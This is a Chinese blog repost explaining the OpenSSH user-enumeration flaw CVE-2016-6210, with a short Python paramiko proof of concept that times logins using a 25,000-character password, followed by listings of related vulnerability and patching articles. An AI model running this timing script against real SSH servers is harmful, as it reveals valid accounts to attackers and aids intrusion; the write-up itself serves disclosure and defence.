OpenSSH 曝枚举系统用户(CVE-2016-6210)漏洞

最新推荐文章于 2023-04-23 14:01:46 发布
最新推荐文章于 2023-04-23 14:01:46 发布
阅读量990 收藏
点赞数
文章标签: python 运维
原文链接:https://yq.aliyun.com/articles/113629
版权

该漏洞在opensshd-7.2p2 中被发现,但是安全人员指出,该漏洞应该在更早的版本中已经存在。

漏洞描述如下:

当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。

如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果用户名存在,服务器将会针对这个10KB大的密码进行SHA256的加密,这里就会产生时间差。

Sample code:
----------------
import paramiko
import time
user=raw_input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=time.clock()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('127.0.0.1', username=user,
        password=p)
except:
        endtime=time.clock()
total=endtime-starttime
print(total)

(Valid users will result in higher total time).

关于该漏洞更多详情,可以在这里查看:

文章转载自 开源中国社区[http://www.oschina.net]

weixin_34357928
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSH用户漏洞poc(CVE-2018-15473)
08-24
OpenSSH用户漏洞poc(CVE-2018-15473),通过poc可以直接检查目标服务器是否存在此漏洞,通过检查漏洞,来及早发现漏洞,打上补丁
Ubuntu 16.04.7 server升级Openssh版本到8.8
wxqndm的博客
11-18 1073
Ubuntu OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515)Ubuntu OpenSSH 安全限制绕过漏洞(CVE-2016-10012)Ubuntu OpenSSH 多个拒绝服务漏洞(CVE-2016-10708)Ubuntu OpenSSH 远程代码执行漏洞(CVE-2016-10009)Ubuntu OpenSSH 远程权限提升漏洞(CVE-2016-10010)Ubuntu OpenSSH 用户漏洞(CVE-2016-6210)
OpenSSH利用处理畸形长度密码造成的时间差,枚系统用户(CVE-2016-6210)
weixin_33798152的博客
07-21 308
受影响版本: opensshd(< =最新版本) CVE-2016-6210漏洞描述: 当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果用...
生产漏洞修复总结
duanbiren123的博客
07-08 5257
1、 修复ssh相关漏洞 漏洞列表: OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515) OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) OpenSSH glob表达式拒绝服务漏洞(CVE-2010-4755) OpenSSH J-PAKE授权问题漏洞(CVE-2010-4478) Openssh MaxAu...
使用 Metasploit 利用 OpenSSH 用户漏洞 (CVE-2018-15473, CVE-2016-6210, CVE-1999-0502)
还没想好昵称的新建p的博客
02-22 1万+
本文大致讲述了如何使用 Metasploit 利用 OpenSSH 用户漏洞。请务必遵守相关法律。(CC-BY-ND 4.0)
Web安全 -- CVE-2016-10033漏洞
redBu1l的博客
12-10 3973
引言CVE-2016-10033漏洞背景独立研究人员Dawid Golunski发现该漏洞—远程攻击者利用该漏洞,可实现远程任意代码在web服务器上执行,并使web应用陷入威胁中。攻击者主要在常见的web表单如意见反悔表单、注册表单中 ,邮件密码重置表单等使用发送的组建时利用此漏洞漏洞影响的版本PHPMailer < 5.2.18环境搭建模拟如图网络环境web服务器配置web服务器的系统为cent
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 1万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
【网络安全】CVE 漏洞分析以及复现
zxcvbnmasdflzl的博客
04-23 737
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
体验ImageMagick 命令执行漏洞(CVE-2016–3714)的PoC
公众号shadow sock7
09-09 3397
首先安装好docker。环境地址GitHub地址: https://github.com/Medicean/VulApps 镜像地址: https://hub.docker.com/r/medicean/vulapps/ 镜像的各种Tag: https://hub.docker.com/r/medicean/vulapps/tags/ 环境搭建获取镜像$ docker pull medi
OpenSSH 用户名枚漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级opensshOpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
解决OpenSSL "SSL-Death-Alert" 拒绝服务漏洞(CVE-2016-8610)安全漏洞,升级OpenSSL到OpenSSL 1.1.0k
10-25
最近放开了https服务,安全组扫描出新的漏洞,现对原OpenSSL 1.0.1g版本升级到OpenSSL 1.1.0k,同时重新编译OpenSSH及nginx,在此提供升级脚本,仅供参考
CVE-2020-15778漏洞-——快速升级——openssh8.6.p1.tar.gz
06-21
OpenSSH 命令注入漏洞(CVE-2020-15778),文件包含installs.sh、openssh-8.6p1.tar.gz、openssl-1.1.1k.tar.gz、zlib-1.2.11.tar.gz。升级时候将openssh.tar.gz放至/home下解压,进入openssh目录,执行chmod +x ...
shiro安全框架的2个CVE漏洞复现
tpaer的博客
09-25 1154
shiro是apache下的一个java安全框架,通常用来进行授权和认证,相比于同样流行的spring security框架,shiro更加轻量更好上手使用的人也更多。此文复现环境为vulhub靶场,以下将复现靶场中的两个shiroCVE漏洞
漏洞预警:OpenSSH 出现远程执行代码漏洞
weixin_33709590的博客
06-06 987
SecurityFocus 在其网站上公布了一个关于 OpenSSH漏洞,信息如下: OpenSSH CVE-2016-10009 远程执行代码漏洞 Bugtraq ID:94968 Class:Unknown CVE:CVE-2016-10009 Remote:Yes Local:No Published:Dec 19 2016 12:00AM U...
CentOS7_2之openSSH低版本漏洞升级终极篇
小达哥的博客
07-17 1668
1、场景:政府类项目上线,必然绕不开等保;什么?什么是等保?这里就不做解释了,先去百度看看吧;直入主题,测评中心扫描服务器漏洞时,扫出来了openSSH的‘安全漏洞’、‘远程代码执行漏洞’等等-->据了解,这是由于版本太低导致的。 2、知道了原因,我们就开始升级吧!说是说升级,其实就是重新安装高版本openSSH(比如我选择的是openssh-7.9p1.tar.gz,原本是6.6)。...
centos升级openssh7.4,OpenSSH远程代码执行漏洞
weixin_33738578的博客
05-15 5175
漏洞编号CVE-2016-10009漏洞名称OpenSSH远程代码执行漏洞漏洞描述sshd服务可以利用转发的agent-socket文件,欺骗本机的ssh-agent来加载一个恶意的PKCS#11模块,从而可以远程执行代码。官方评级中危漏洞危害***利用漏洞实现远程命令执行,严重情况下可能会导致数据泄露。漏洞利用条件可以实现远程利用。该漏洞利用依赖ssh-agent。该进程默...
openssh 用户漏洞(cve-2018-15473)【原理扫描】
最新发布
09-07
OpenSSH 用户漏洞CVE-2018-15473)是一种原理扫描漏洞,存在于OpenSSH服务器软件中。这个漏洞的原理是攻击者可以通过发送特制的SSH请求来判断系统中存在的用户账号。 具体来说,攻击者可以发送一个无效的SSH连接请求(例如,使用无效的用户名)到目标系统OpenSSH服务器。如果服务器返回了错误消息"Permission denied, please try again",那么攻击者就可以通过多次发送请求,不断尝试不同的用户名来逐步枚系统中存在的合法用户。 例如,如果攻击者发送了一个无效的用户名"admin",服务器返回错误消息,然后再发送一个无效的用户名"guest",服务器返回错误消息,这样攻击者就可以得出结论系统中既不存在"admin"也不存在"guest"这两个用户名。但是,如果攻击者发送一个有效的用户名,而OpenSSH服务器返回了不同的错误消息,比如"Invalid user",那么攻击者就可以确定该系统中存在该用户名。 这个漏洞可以被利用来枚系统中的用户账号,这给攻击者提供了很好的机会来获取有关系统用户的信息,可能会导致系统的其他安全问题。为了防止这个漏洞的利用,建议管理员及时更新OpenSSH服务器的版本,因为该漏洞OpenSSH 7.7之前的版本中存在。此外,还可以通过配置服务器以禁用用户功能来进一步增强系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值